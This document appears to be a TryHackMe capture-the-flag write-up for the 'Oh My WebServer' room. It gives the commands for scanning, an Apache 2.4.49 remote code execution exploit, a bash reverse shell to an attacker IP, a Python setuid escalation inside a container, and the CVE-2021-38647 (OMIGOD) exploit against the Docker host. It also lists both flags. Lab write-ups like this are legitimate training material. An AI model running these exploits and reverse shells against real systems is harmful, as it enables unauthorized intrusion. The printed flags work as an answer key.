Skip to content

Latest commit

 

History

History
175 lines (113 loc) · 4.37 KB

ohmyweb.md

File metadata and controls

175 lines (113 loc) · 4.37 KB

image# Oh My WebServer

Can you root me?

Scanning

scan the target

nmap -A -T4 10.10.178.132

image

HTTP

check the webpage

image

Enumeration

scan the directory

gobuster dir -u http://10.10.178.132/ -w /usr/share/wordlists/dirb/common.txt -t 30

image

we have an assets for all file in here

image

and cgi-bin can use for access any assets

image

Exploitation

let's find some exploit

searchsploit apache 2.4.49

image

searchsploit -m 50383.sh
echo http://10.10.178.132 > target.txt

and you can use like that

image

do a reverse shell

./50383.sh target.txt /bin/bash "bash -i >& /dev/tcp/10.18.37.45/4444 0>&1"

nc -vlnp 4444

image

it's seem we are in docker container

image

and there is no flag inside docker, check for capibilities

getcap -r / 2>/dev/null

image

leverage it

image

python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'

image

our flag is on root folder of the container

Flag user.txt
Answer THM{eacffefe1d2aafcc15e70dc2f07f7ac1}

Privilege Escalation

now, we need to escalation to real machine, not docker

guess that the host is 172.17.0.1, since we are on 172.17.0.2

image

now, it need the support of nmap

on attacker machine

wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap
python3 -m http.server

on target machine

curl http://10.18.37.45:8000/nmap -o nmap
chmod 777 nmap

now we can use nmap

./nmap 172.17.0.1 -p- --min-rate 5000
Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Host is up (0.00042s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown

search for port 5986 service exploit, i found CVE-2021-38647

image

clone to attacker machine

git clone https://github.com/AlteredSecurity/CVE-2021-38647
cd CVE-2021-38647
python3 -m http.server

on target machine

curl http://10.18.37.45:8000/CVE-2021-38647.py -o CVE-2021-38647.py
curl http://10.18.37.45:8000/Invoke-CVE-2021-38647.ps1 -o Invoke-CVE-2021-38647.ps1

now, exploit as following

python3 CVE-2021-38647.py -t 172.17.0.1 -c 'id'
python3 CVE-2021-38647.py -t 172.17.0.1 -c 'hostname'
python3 CVE-2021-38647.py -t 172.17.0.1 -c 'uname -a'

we have exploited on actual machine

image

python3 CVE-2021-38647.py -t 172.17.0.1 -c 'cat /root/root.txt'

image

Flag root.txt
Answer THM{7f147ef1f36da9ae29529890a1b6011f}